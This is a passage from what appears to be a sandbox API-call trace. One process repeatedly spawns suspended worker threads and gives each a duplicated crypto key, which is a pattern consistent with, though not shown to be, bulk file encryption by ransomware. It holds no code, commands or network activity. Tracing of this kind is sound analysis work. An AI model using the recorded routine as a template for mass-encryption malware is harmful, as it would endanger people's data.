0x28f97b0 [0143.663] GetCurrentThreadId () returned 0x2ec [0143.663] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x8fc [0143.663] _beginthreadex (in: _Security=0x0, _StackSize=0x0, _StartAddress=0x431600, _ArgList=0x28f97b0, _InitFlag=0x4, _ThrdAddr=0x0 | out: _ThrdAddr=0x0) returned 0x900 [0143.664] SetThreadPriority (hThread=0x900, nPriority=0) returned 1 [0143.664] ResetEvent (hEvent=0x8fc) returned 1 [0143.664] ResumeThread (hThread=0x900) returned 0x1 [0143.664] Sleep (dwMilliseconds=0x0) [0143.665] CryptDuplicateKey (in: hKey=0x8c6be8, pdwReserved=0x0, dwFlags=0x0, phKey=0x607934 | out: phKey=0x607934*=0x918f00) returned 1 [0143.665] GetCurrentThreadId () returned 0x2ec [0143.665] calloc (_Count=0x1, _Size=0xb8) returned 0x28fa6b0 [0143.665] GetCurrentThreadId () returned 0x2ec [0143.665] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x910 [0143.665] _beginthreadex (in: _Security=0x0, _StackSize=0x0, _StartAddress=0x431600, _ArgList=0x28fa6b0, _InitFlag=0x4, _ThrdAddr=0x0 | out: _ThrdAddr=0x0) returned 0x914 [0143.666] SetThreadPriority (hThread=0x914, nPriority=0) returned 1 [0143.666] ResetEvent (hEvent=0x910) returned 1 [0143.666] ResumeThread (hThread=0x914) returned 0x1 [0143.666] Sleep (dwMilliseconds=0x0) [0143.668] CryptDuplicateKey (in: hKey=0x8c6be8, pdwReserved=0x0, dwFlags=0x0, phKey=0x6078d4 | out: phKey=0x6078d4*=0x9191c0) returned 1 [0143.670] GetCurrentThreadId () returned 0x2ec [0143.670] calloc (_Count=0x1, _Size=0xb8) returned 0x28f9cf0 [0143.670] GetCurrentThreadId () returned 0x2ec [0143.671] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x924 [0143.671] _beginthreadex (in: _Security=0x0, _StackSize=0x0, _StartAddress=0x431600, _ArgList=0x28f9cf0, _InitFlag=0x4, _ThrdAddr=0x0 | out: _ThrdAddr=0x0) returned 0x928 [0143.673] SetThreadPriority (hThread=0x928, nPriority=0) returned 1 [0143.673] ResetEvent (hEvent=0x924) returned 1 [0143.674] ResumeThread (hThread=0x928) returned 0x1 [0143.674] Sleep (dwMilliseconds=0x0) [0143.675] CryptDuplicateKey (in: hKey=0x8c6be8, pdwReserved=0x0, dwFlags=0x0, phKey=0x607944 | out: phKey=0x607944*=0x918f40) returned 1 [0143.675] GetCurrentThreadId () returned 0x2ec [0143.675] calloc (_Count=0x1, _Size=0xb8) returned 0x28fa770 [0143.675] GetCurrentThreadId () returned 0x2ec [0143.675] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x938 [0143.675] _beginthreadex (in: _Security=0x0, _StackSize=0x0, _StartAddress=0x431600, _ArgList=0x28fa770, _InitFlag=0x4, _ThrdAddr=0x0 | out: _ThrdAddr=0x0) returned 0x93c [0143.676] SetThreadPriority (hThread=0x93c, nPriority=0) returned 1 [0143.676] ResetEvent (hEvent=0x938) returned 1 [0143.676] ResumeThread (hThread=0x93c) returned 0x1 [0143.677] Sleep (dwMilliseconds=0x0) [0143.678] CryptDuplicateKey (in: hKey=0x8c6be8, pdwReserved=0x0, dwFlags=0x0, phKey=0x607884 | out: phKey=0x607884*=0x918f80) returned 1 [0143.678] GetCurrentThreadId () returned 0x2ec [0143.678] calloc (_Count=0x1, _Size=0xb8) returned 0x28f94b0 [0143.678] GetCurrentThreadId () returned 0x2ec [0143.678] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x94c [0143.678] _beginthreadex (in: _Security=0x0, _StackSize=0x0, _StartAddress=0x431600, _ArgList=0x28f94b0, _InitFlag=0x4, _ThrdAddr=0x0 | out: _ThrdAddr=0x0) returned 0x950 [0143.678] SetThreadPriority (hThread=0x950, nPriority=0) returned 1 [0143.678] ResetEvent (hEvent=0x94c) returned 1 [0143.678] ResumeThread (hThread=0x950) returned 0x1 [0143.678] Sleep (dwMilliseconds=0x0) [0143.679] CryptDuplicateKey (in: hKey=0x8c6be8, pdwReserved=0x0, dwFlags=0x0, phKey=0x607804 | out: phKey=0x607804*=0x918fc0) returned 1 [0143.679] GetCurrentThreadId () returned 0x2ec [0143.679] calloc (_Count=0x1, _Size=0xb8) returned 0x28fa230 [0143.680] GetCurrentThreadId () returned 0x2ec [0143.680] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x960 [0143.680] _beginthreadex (in: _Security=0x0, _StackSize=0x0, _StartAddress=0x431600, _ArgList=0x28fa230, _InitFlag=0x4, _ThrdAddr=0x0 | out: _ThrdAddr=0x0) returned 0x964 [0143.680] SetThreadPriority (hThread=0x964, nPriority=0) returned 1 [0143.680] ResetEvent (hEvent=0x960) returned 1 [0143.680] ResumeThread (hThread=0x964) returned 0x1 [0143.680] Sleep (dwMilliseconds=0x0) [0143.681] CryptDuplicateKey (in: hKey=0x8c6be8, pdwReserved=0x0, dwFlags=0x0, phKey=0x6078a4 | out: phKey=0x6078a4*=0x9190c0) returned 1 [0143.682] GetCurrentThreadId () returned 0x2ec [0143.682] calloc (_Count=0x1, _Size=0xb8) returned 0x28f9c30 [0143.682] GetCurrentThreadId () returned 0x2ec [0143.682] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x974 [0143.682] _beginthreadex (in: _Security=0x0, _StackSize=0x0, _StartAddress=0x431600, _ArgList=0x28f9c30, _InitFlag=0x4, _ThrdAddr=0x0 | out: _ThrdAddr=0x0) returned 0x978 [0143.682] SetThreadPriority (hThread=0x978, nPriority=0) returned 1 [0143.682] ResetEvent (hEvent=0x974) returned 1 [0143.682] ResumeThread (hThread=0x978) returned 0x1 [0143.682] Sleep (dwMilliseconds=0x0) [0143.684] CryptDuplicateKey (in: hKey=0x8c6be8, pdwReserved=0x0, dwFlags=0x0, phKey=0x607954 | out: phKey=0x607954*=0x918c40) returned 1 [0143.684] GetCurrentThreadId () returned 0x2ec [0143.684] calloc (_Count=0x1, _Size=0xb8) returned 0x28fa2f0 [0143.684] GetCurrentThreadId () returned 0x2ec [0143.684] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x988 [0143.684] _beginthreadex (in: _Security=0x0, _StackSize=0x0, _StartAddress=0x431600, _ArgList=0x28fa2f0, _InitFlag=0x4, _ThrdAddr=0x0 | out: _ThrdAddr=0x0) returned 0x98c [0143.684] SetThreadPriority (hThread=0x98c, nPriority=0) returned 1 [0143.684] ResetEvent (hEvent=0x988) returned 1 [0143.684] ResumeThread (hThread=0x98c) returned 0x1 [0143.684] Sleep (dwMilliseconds=0x0) [0143.685] CryptDuplicateKey (in: hKey=0x8c6be8, pdwReserved=0x0, dwFlags=0x0, phKey=0x6078e4 | out: phKey=0x6078e4*=0x9189c0) returned 1 [0143.685] GetCurrentThreadId () returned 0x2ec [0143.685] calloc (_Count=0x1, _Size=0xb8) returned 0x28f9db0 [0143.685] GetCurrentThreadId () returned 0x2ec [0143.685] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x99c [0143.685] _beginthreadex (in: _Security=0x0, _StackSize=0x0, _StartAddress=0x431600, _ArgList=0x28f9db0, _InitFlag=0x4, _ThrdAddr=0x0 | out: _ThrdAddr=0x0) returned 0x9a0 [0143.686] SetThreadPriority (hThread=0x9a0, nPriority=0) returned 1 [0143.686] ResetEvent (hEvent=0x99c) returned 1 [0143.686] ResumeThread (hThread=0x9a0) returned 0x1 [0143.686] Sleep (dwMilliseconds=0x0) [0143.687] CryptDuplicateKey (in: hKey=0x8c6be8, pdwReserved=0x0, dwFlags=0x0, phKey=0x6078f4 | out: phKey=0x6078f4*=0x918900) returned 1 [0143.687] GetCurrentThreadId () returned 0x2ec [0143.687] calloc (_Count=0x1, _Size=0xb8) returned 0x28f93f0 [0143.687] GetCurrentThreadId () returned 0x2ec [0143.687] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x9b0 [0143.687] _beginthreadex (in: _Security=0x0, _StackSize=0x0, _StartAddress=0x431600, _ArgList=0x28f93f0, _InitFlag=0x4, _ThrdAddr=0x0 | out: _ThrdAddr=0x0) returned 0x9b4 [0143.687] SetThreadPriority (hThread=0x9b4, nPriority=0) returned 1 [0143.687] ResetEvent (hEvent=0x9b0) returned 1 [0143.687] ResumeThread (hThread=0x9b4) returned 0x1 [0143.688] Sleep (dwMilliseconds=0x0) [0143.690] CryptDuplicateKey (in: hKey=0x8c6be8, pdwReserved=0x0, dwFlags=0x0, phKey=0x607904 | out: phKey=0x607904*=0x918bc0) returned 1 [0143.691] GetCurrentThreadId () returned 0x2ec [0143.691] calloc (_Count=0x1, _Size=0xb8) returned 0x28f9570 [0143.691] GetCurrentThreadId () returned 0x2ec [0143.691] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x9c4 [0143.691] _beginthreadex (in: _Security=0x0, _StackSize=0x0, _StartAddress=0x431600, _ArgList=0x28f9570, _InitFlag=0x4, _ThrdAddr=0x0 | out: _ThrdAddr=0x0) returned 0x9c8 [0143.691] SetThreadPriority (hThread=0x9c8, nPriority=0) returned 1 [0143.691] ResetEvent (hEvent=0x9c4) returned 1 [0143.691] ResumeThread (hThread=0x9c8) returned 0x1 [0143.691] Sleep (dwMilliseconds=0x0) [0143.692] CryptDuplicateKey (in: hKey=0x8c6be8, pdwReserved=0x0, dwFlags=0x0, phKey=0x607914 | out: phKey=0x607914*=0x918780) returned 1 [0143.693] GetCurrentThreadId () returned 0x2ec [0143.693] calloc (_Count=0x1, _Size=0xb8) returned 0x28fa8f0 [0143.693] GetCurrentThreadId () returned 0x2ec [0143.693] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x9d8 [0143.693] _beginthreadex (in: _Security=0x0, _StackSize=0x0, _StartAddress=0x431600, _ArgList=0x28fa8f0, _InitFlag=0x4, _ThrdAddr=0x0 | out: _ThrdAddr=0x0) returned 0x9dc [0143.693] SetThreadPriority (hThread=0x9dc, nPriority=0) returned 1 [0143.693] ResetEvent (hEvent=0x9d8) returned 1 [0143.693] ResumeThread (hThread=0x9dc) returned 0x1 [0143.693] Sleep (dwMilliseconds=0x0) [0143.695] CryptDuplicateKey (in: hKey=0x8c6be8, pdwReserved=0x0, dwFlags=0x0, phKey=0x6077a4 | out: phKey=0x6077a4*=0x918c80) returned 1 [0143.695] GetCurrentThreadId () returned 0x2ec [0143.695] calloc (_Count=0x1, _Size=0xb8) returned 0x28fa9b0 [0143.695] GetCurrentThreadId () returned 0x2ec [0143.695] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x9ec [0143.695] _beginthreadex (in: _Security=0x0, _StackSize=0x0, _StartAddress=0x431600, _ArgList=0x28fa9b0, _InitFlag=0x4, _ThrdAddr=0x0 | out: _ThrdAddr=0x0) returned 0x9f0 [0143.696] SetThreadPriority (hThread=0x9f0, nPriority=0) returned 1 [0143.696] ResetEvent (hEvent=0x9ec) returned 1 [0143.696] ResumeThread (hThread=0x9f0) returned 0x1 [0143.696] Sleep (dwMilliseconds=0x0) [0143.697] CryptDuplicateKey (in: hKey=0x8c6be8, pdwReserved=0x0, dwFlags=0x0, phKey=0x6077b4 | out: phKey=0x6077b4*=0x918a80) returned 1 [0143.697] GetCurrentThreadId () returned 0x2ec [0143.697] calloc (_Count=0x1, _Size=0xb8) returned 0x28faa70 [0143.697] GetCurrentThreadId () returned 0x2ec [0143.697] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0xa00 [0143.697] _beginthreadex (in: _Security=0x0, _StackSize=0x0, _StartAddress=0x431600, _ArgList=0x28faa70, _InitFlag=0x4, _ThrdAddr=0x0 | out: _ThrdAddr=0x0) returned 0xa04 [0143.698] SetThreadPriority (hThread=0xa04, nPriority=0) returned 1 [0143.698] ResetEvent (hEvent=0xa00) returned 1 [0143.698] ResumeThread (hThread=0xa04) returned 0x1 [0143.698] Sleep (dwMilliseconds=0x0) [0143.699] CryptDuplicateKey (in: hKey=0x8c6be8, pdwReserved=0x0, dwFlags=0x0, phKey=0x6077c4 | out: phKey=0x6077c4*=0x918cc0) returned 1 [0143.699] GetCurrentThreadId () returned 0x2ec [0143.699] calloc (_Count=0x1, _Size=0xb8) returned 0x28f9ab0 [0143.699] GetCurrentThreadId () returned 0x2ec [0143.699] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0xa14 [0143.699] _beginthreadex (in: _Security=0x0, _StackSize=0x0, _StartAddress=0x431600, _ArgList=0x28f9ab0, _InitFlag=0x4, _ThrdAddr=0x0 | out: _ThrdAddr=0x0) returned 0xa18 [0143.700] SetThreadPriority (hThread=0xa18, nPriority=0) returned 1 [0143.700] ResetEvent (hEvent=0xa14) returned 1 [0143.700] ResumeThread (hThread=0xa18) returned 0x1 [0143.700] Sleep (dwMilliseconds=0x0) [0143.701] CryptDuplicateKey (in: hKey=0x8c6be8, pdwReserved=0x0, dwFlags=0x0, phKey=0x6077e4 | out: phKey=0x6077e4*=0x9188c0) returned 1 [0143.701] GetCurrentThreadId () returned 0x2ec [0143.701] calloc (_Count=0x1, _Size=0xb8) returned 0x28f9ff0 [0143.701] GetCurrentThreadId () returned 0x2ec [0143.701] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0xa28 [0143.701] _beginthreadex (in: _Security=0x0, _StackSize=0x0, _StartAddress=0x431600, _ArgList=0x28f9ff0, _InitFlag=0x4, _ThrdAddr=0x0 | out: _ThrdAddr=0x0) returned 0xa2c [0143.701] SetThreadPriority (hThread=0xa2c, nPriority=0) returned 1 [0143.701] ResetEvent (hEvent=0xa28) returned 1 [0143.701] ResumeThread (hThread=0xa2c) returned 0x1 [0143.701] Sleep (dwMilliseconds=0x0) [0143.702] CryptDuplicateKey (in: hKey=0x8c6be8, pdwReserved=0x0, dwFlags=0x0, phKey=0x29217f4 | out: phKey=0x29217f4*=0x918ac0) returned 1 [0143.703] GetCurrentThreadId () returned 0x2ec [0143.703] calloc (_Count=0x1, _Size=0xb8) returned 0x28f9330 [0143.703] GetCurrentThreadId () returned 0x2ec [0143.703] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0xa3c [0143.703] _beginthreadex (in: _Security=0x0, _StackSize=0x0, _StartAddress=0x431600, _ArgList=0x28f9330, _InitFlag=0x4, _ThrdAddr=0x0 | out: _ThrdAddr=0x0) returned 0xa40 [0143.703] SetThreadPriority (hThread=0xa40, nPriority=0) returned 1 [0143.703] ResetEvent (hEvent=0xa3c) returned 1 [0143.703] ResumeThread (hThread=0xa40) returned 0x1 [0143.703] Sleep (dwMilliseconds=0x0) [0143.704] CryptDuplicateKey (in: hKey=0x8c6be8, pdwReserved=0x0, dwFlags=0x0, phKey=0x29218b4 | out: phKey=0x29218b4*=0x918d00) returned 1 [0143.704] GetCurrentThreadId () returned 0x2ec [0143.704] calloc (_Count=0x1, _Size=0xb8) returned 0x28f9630 [0143.704] GetCurrentThreadId () returned 0x2ec [0143.704] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0xa50 [0143.704] _beginthreadex (in: _Security=0x0, _StackSize=0x0, _StartAddress=0x431600, _ArgList=0x28f9630, _InitFlag=0x4, _ThrdAddr=0x0 | out: _ThrdAddr=0x0) returned 0xa54 [0143.705] SetThreadPriority (hThread=0xa54, nPriority=0) returned 1 [0143.705] ResetEvent (hEvent=0xa50) returned 1 [0143.705] ResumeThread (hThread=0xa54) returned 0x1 [0143.705] Sleep (dwMilliseconds=0x0) [0143.734] CryptDuplicateKey (in: hKey=0x8c6be8, pdwReserved=0x0, dwFlags=0x0, phKey=0x29218a4 | out: phKey=0x29218a4*=0x918a40) returned 1 [0143.734] GetCurrentThreadId () returned 0x2ec [0143.734] calloc (_Count=0x1, _Size=0xb8) returned 0x28f9b70 [0143.734] GetCurrentThreadId () returned 0x2ec [0143.734] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0xa64 [0143.734] _beginthreadex (in: _Security=0x0, _StackSize=0x0, _StartAddress=0x431600, _ArgList=0x28f9b70, _InitFlag=0x4, _ThrdAddr=0x0 | out: _ThrdAddr=0x0) returned 0xa68 [0143.735] SetThreadPriority (hThread=0xa68, nPriority=0) returned 1 [0143.735] ResetEvent (hEvent=0xa64) returned 1 [0143.735] ResumeThread (hThread=0xa68) returned 0x1 [0143.735] Sleep (dwMilliseconds=0x0) [0143.740] CryptDuplicateKey (in: hKey=0x8c6be8, pdwReserved=0x0, dwFlags=0x0, phKey=0x2921824 | out: phKey=0x2921824*=0x9187c0) returned 1 [0143.741] GetCurrentThreadId () returned 0x2ec [0143.741] calloc (_Count=0x1, _Size=0xb8) returned 0x28f9e70 [0143.741] GetCurrentThreadId () returned 0x2ec [0143.741] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0xa78 [0143.741] _beginthreadex (in: _Security=0x0, _StackSize=0x0, _StartAddress=0x431600, _ArgList=0x28f9e70, _InitFlag=0x4, _ThrdAddr=0x0 | out: _ThrdAddr=0x0) returned 0xa7c [0143.741] SetThreadPriority (hThread=0xa7c, nPriority=0) returned 1 [0143.741] ResetEvent (hEvent=0xa78) returned 1 [0143.741] ResumeThread (hThread=0xa7c) returned 0x1 [0143.742] Sleep (dwMilliseconds=0x0) [0143.743] CryptDuplicateKey (in: hKey=0x8c6be8, pdwReserved=0x0, dwFlags=0x0, phKey=0x29218c4 | out: phKey=0x29218c4*=0x918600) returned 1 [0143.743] GetCurrentThreadId () returned 0x2ec [0143.743] calloc (_Count=0x1, _Size=0xb8) returned 0x28fa3b0 [0143.743] GetCurrentThreadId () returned 0x2ec [0143.743] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0xa8c [0143.743] _beginthreadex (in: _Security=0x0, _StackSize=0x0, _StartAddress=0x431600, _ArgList=0x28fa3b0, _InitFlag=0x4, _ThrdAddr=0x0 | out: _ThrdAddr=0x0) returned 0xa90 [0143.743] SetThreadPriority (hThread=0xa90, nPriority=0) returned 1 [0143.743] ResetEvent (hEvent=0xa8c) returned 1 [0143.743] ResumeThread (hThread=0xa90) returned 0x1 [0143.743] Sleep (dwMilliseconds=0x0) [0143.744] CryptDuplicateKey (in: hKey=0x8c6be8, pdwReserved=0x0, dwFlags=0x0, phKey=0x2921834 | out: phKey=0x2921834*=0x918b80) returned 1 [0143.744] GetCurrentThreadId () returned 0x2ec [0143.744] calloc (_Count=0x1, _Size=0xb8) returned 0x28f9f30 [0143.744] GetCurrentThreadId () returned 0x2ec [0143.744] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0xaa0 [0143.744] _beginthreadex (in: _Security=0x0, _StackSize=0x0, _StartAddress=0x431600, _ArgList=0x28f9f30, _InitFlag=0x4, _ThrdAddr=0x0 | out: _ThrdAddr=0x0) returned 0xaa4 [0143.745] SetThreadPriority (hThread=0xaa4, nPriority=0) returned 1 [0143.745] ResetEvent (hEvent=0xaa0) returned 1 [0143.745] ResumeThread (hThread=0xaa4) returned 0x1 [0143.745] Sleep (dwMilliseconds=0x0) [0143.746] CryptDuplicateKey (in: hKey=0x8c6be8, pdwReserved=0x0, dwFlags=0x0, phKey=0x2921974 | out: phKey=0x2921974*=0x9186c0) returned 1 [0143.746] GetCurrentThreadId () returned 0x2ec [0143.746] calloc (_Count=0x1, _Size=0xb8) returned 0x28fa0b0 [0143.746] GetCurrentThreadId () returned 0x2ec [0143.746] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0xab4 [0143.746] _beginthreadex (in: _Security=0x0, _StackSize=0x0, _StartAddress=0x431600, _ArgList=0x28fa0b0, _InitFlag=0x4, _ThrdAddr=0x0 | out: _ThrdAddr=0x0) returned 0xab8 [0143.746] SetThreadPriority (hThread=0xab8, nPriority=0) returned 1 [0143.746] ResetEvent (hEvent=0xab4) returned 1 [0143.746] ResumeThread (hThread=0xab8) returned 0x1 [0143.746] Sleep (dwMilliseconds=0x0) [0143.747] CryptDuplicateKey (in: hKey=0x8c6be8, pdwReserved=0x0, dwFlags=0x0, phKey=0x2921804 | out: phKey=0x2921804*=0x918700) returned 1 [0143.748] GetCurrentThreadId () returned 0x2ec [0143.748] calloc (_Count=0x1, _Size=0xb8) returned 0x2923078 [0143.748] GetCurrentThreadId () returned 0x2ec [0143.748] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0xac8 [0143.748] _beginthreadex (in: _Security=0x0, _StackSize=0x0, _StartAddress=0x431600, _ArgList=0x2923078, _InitFlag=0x4, _ThrdAddr=0x0 | out: _ThrdAddr=0x0) returned 0xacc [0143.749] SetThreadPriority (hThread=0xacc, nPriority=0) returned 1 [0143.749] ResetEvent (hEvent=0xac8) returned 1 [0143.749] ResumeThread (hThread=0xacc) returned 0x1 [0143.749] Sleep (dwMilliseconds=0x0) [0143.750] CryptDuplicateKey (in: hKey=0x8c6be8, pdwReserved=0x0, dwFlags=0x0, phKey=0x2921964 | out: phKey=0x2921964*=0x918980) returned 1 [0143.750] GetCurrentThreadId () returned 0x2ec [0143.750] calloc (_Count=0x1, _Size=0xb8) returned 0x2922fb8 [0143.750] GetCurrentThreadId () returned 0x2ec [0143.750] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0xadc [0143.750] _beginthreadex (in: _Security=0x0, _StackSize=0x0, _StartAddress=0x431600, _ArgList=0x2922fb8, _InitFlag=0x4, _ThrdAddr=0x0 | out: _ThrdAddr=0x0) returned 0xae0 [0143.750] SetThreadPriority (hThread=0xae0, nPriority=0) returned 1 [0143.750] ResetEvent (hEvent=0xadc) returned 1 [0143.750] ResumeThread (hThread=0xae0) returned 0x1 [0143.750] Sleep (dwMilliseconds=0x0) [0143.751] CryptDuplicateKey (in: hKey=0x8c6be8, pdwReserved=0x0, dwFlags=0x0, phKey=0x2921994 | out: phKey=0x2921994*=0x918c00) returned 1 [0143.751] GetCurrentThreadId () returned 0x2ec [0143.751] calloc (_Count=0x1, _Size=0xb8) returned 0x2921e78 [0143.751] GetCurrentThreadId () returned 0x2ec [0143.751] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0xaf0 [0143.751] _beginthreadex (in: _Security=0x0, _StackSize=0x0, _StartAddress=0x431600, _ArgList=0x2921e78, _InitFlag=0x4, _ThrdAddr=0x0 | out: _ThrdAddr=0x0) returned 0xaf4 [0143.752] SetThreadPriority (hThread=0xaf4, nPriority=0) returned 1 [0143.752] ResetEvent (hEvent=0xaf0) returned 1 [0143.752] ResumeThread (hThread=0xaf4) returned 0x1 [0143.752] Sleep (dwMilliseconds=0x0) [0143.753] CryptDuplicateKey (in: hKey=0x8c6be8, pdwReserved=0x0, dwFlags=0x0, phKey=0x2921914 | out: phKey=0x2921914*=0x918b00) returned 1 [0143.753] GetCurrentThreadId () returned 0x2ec [0143.753] calloc (_Count=0x1, _Size=0xb8) returned 0x2921f38 [0143.753] GetCurrentThreadId () returned 0x2ec [0143.753] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0xb04 [0143.753] _beginthreadex (in: _Security=0x0, _StackSize=0x0, _StartAddress=0x431600, _ArgList=0x2921f38, _InitFlag=0x4, _ThrdAddr=0x0 | out: _ThrdAddr=0x0) returned 0xb08 [0143.753] SetThreadPriority (hThread=0xb08, nPriority=0) returned 1 [0143.753] ResetEvent (hEvent=0xb04) returned 1 [0143.753] ResumeThread (hThread=0xb08) returned 0x1 [0143.753] Sleep (dwMilliseconds=0x0) [0143.756] CryptDuplicateKey (in: hKey=0x8c6be8, pdwReserved=0x0, dwFlags=0x0, phKey=0x2921844 | out: phKey=0x2921844*=0x918d40) returned 1 [0143.756] GetCurrentThreadId () returned 0x2ec [0143.756] calloc (_Count=0x1, _Size=0xb8) returned 0x2922838 [0143.756] GetCurrentThreadId () returned 0x2ec [0143.756] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0xb18 [0143.756] _beginthreadex (in: _Security=0x0, _StackSize=0x0, _StartAddress=0x431600, _ArgList=0x2922838, _InitFlag=0x4, _ThrdAddr=0x0 | out: _ThrdAddr=0x0) returned 0xb1c [0143.757] SetThreadPriority (hThread=0xb1c, nPriority=0) returned 1 [0143.757] ResetEvent (hEvent=0xb18) returned 1 [0143.757] ResumeThread (hThread=0xb1c) returned 0x1 [0143.757] Sleep (dwMilliseconds=0x0) [0143.758] CryptDuplicateKey (in: hKey=0x8c6be8, pdwReserved=0x0, dwFlags=0x0, phKey=0x29218f4 | out: phKey=0x29218f4*=0x918880) returned 1 [0143.759] GetCurrentThreadId () returned 0x2ec [0143.759] calloc (_Count=0x1, _Size=0xb8) returned 0x2922cb8 [0143.759] GetCurrentThreadId () returned 0x2ec [0143.759] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0xb2c [0143.759] _beginthreadex (in: _Security=0x0, _StackSize=0x0, _StartAddress=0x431600, _ArgList=0x2922cb8, _InitFlag=0x4, _ThrdAddr=0x0 | out: _ThrdAddr=0x0) returned 0xb30 [0143.759] SetThreadPriority (hThread=0xb30, nPriority=0) returned 1 [0143.759] ResetEvent (hEvent=0xb2c) returned 1 [0143.759] ResumeThread (hThread=0xb30) returned 0x1 [0143.759] Sleep (dwMilliseconds=0x0) [0143.760] CryptDuplicateKey (in: hKey=0x8c6be8, pdwReserved=0x0, dwFlags=0x0, phKey=0x2921904 | out: phKey=0x2921904*=0x918b40) returned 1 [0143.761] GetCurrentThreadId () returned 0x2ec [0143.761] calloc (_Count=0x1, _Size=0xb8) returned 0x2921ff8 [0143.761] GetCurrentThreadId () returned 0x2ec [0143.761] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0xb40 [0143.761] _beginthreadex (in: _Security=0x0, _StackSize=0x0, _StartAddress=0x431600, _ArgList=0x2921ff8, _InitFlag=0x4, _ThrdAddr=0x0 | out: _ThrdAddr=0x0) returned 0xb44 [0143.762] SetThreadPriority (hThread=0xb44, nPriority=0) returned 1 [0143.762] ResetEvent (hEvent=0xb40) returned 1 [0143.762] ResumeThread (hThread=0xb44) returned 0x1 [0143.762] Sleep (dwMilliseconds=0x0) [0143.763] CryptDuplicateKey (in: hKey=0x8c6be8, pdwReserved=0x0, dwFlags=0x0, phKey=0x2921864 | out: phKey=0x2921864*=0x918580) returned 1 [0143.763] GetCurrentThreadId () returned 0x2ec [0143.763] calloc (_Count=0x1, _Size=0xb8) returned 0x2922478 [0143.763] GetCurrentThreadId () returned 0x2ec [0143.763] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0xb54 [0143.763] _beginthreadex (in: _Security=0x0, _StackSize=0x0, _StartAddress=0x431600, _ArgList=0x2922478, _InitFlag=0x4, _ThrdAddr=0x0 | out: _ThrdAddr=0x0) returned 0xb58 [0143.764] SetThreadPriority (hThread=0xb58, nPriority=0) returned 1 [0143.764] ResetEvent (hEvent=0xb54) returned 1 [0143.764] ResumeThread (hThread=0xb58) returned 0x1 [0143.764] Sleep (dwMilliseconds=0x0) [0143.765] CryptDuplicateKey (in: hKey=0x8c6be8, pdwReserved=0x0, dwFlags=0x0, phKey=0x2921924 | out: phKey=0x2921924*=0x918940) returned 1 [0143.765] GetCurrentThreadId () returned 0x2ec [0143.765] calloc (_Count=0x1, _Size=0xb8) returned 0x2921b78 [0143.765] GetCurrentThreadId () returned 0x2ec [0143.765] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0xb68 [0143.765] _beginthreadex (in: _Security=0x0, _StackSize=0x0, _StartAddress=0x431600, _ArgList=0x2921b78, _InitFlag=0x4, _ThrdAddr=0x0 | out: _ThrdAddr=0x0) returned 0xb6c [0143.766] SetThreadPriority (hThread=0xb6c, nPriority=0) returned 1 [0143.766] ResetEvent (hEvent=0xb68) returned 1 [0143.766] ResumeThread (hThread=0xb6c) returned 0x1 [0143.766] Sleep (dwMilliseconds=0x0) [0143.767] CryptDuplicateKey (in: hKey=0x8c6be8, pdwReserved=0x0, dwFlags=0x0, phKey=0x29218e4 | out: phKey=0x29218e4*=0x9185c0) returned 1 [0143.767] GetCurrentThreadId () returned 0x2ec [0143.767] calloc (_Count=0x1, _Size=0xb8) returned 0x2921c38 [0143.767] GetCurrentThreadId () returned 0x2ec [0143.768] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0xb7c [0143.768] _beginthreadex (in: _Security=0x0, _StackSize=0x0, _StartAddress=0x431600, _ArgList=0x2921c38, _InitFlag=0x4, _ThrdAddr=0x0 | out: _ThrdAddr=0x0) returned 0xb80 [0143.768] SetThreadPriority (hThread=0xb80, nPriority=0) returned 1 [0143.768] ResetEvent (hEvent=0xb7c) returned 1 [0143.768] ResumeThread (hThread=0xb80) returned 0x1 [0143.768] Sleep (dwMilliseconds=0x0) [0143.770] ResumeThread 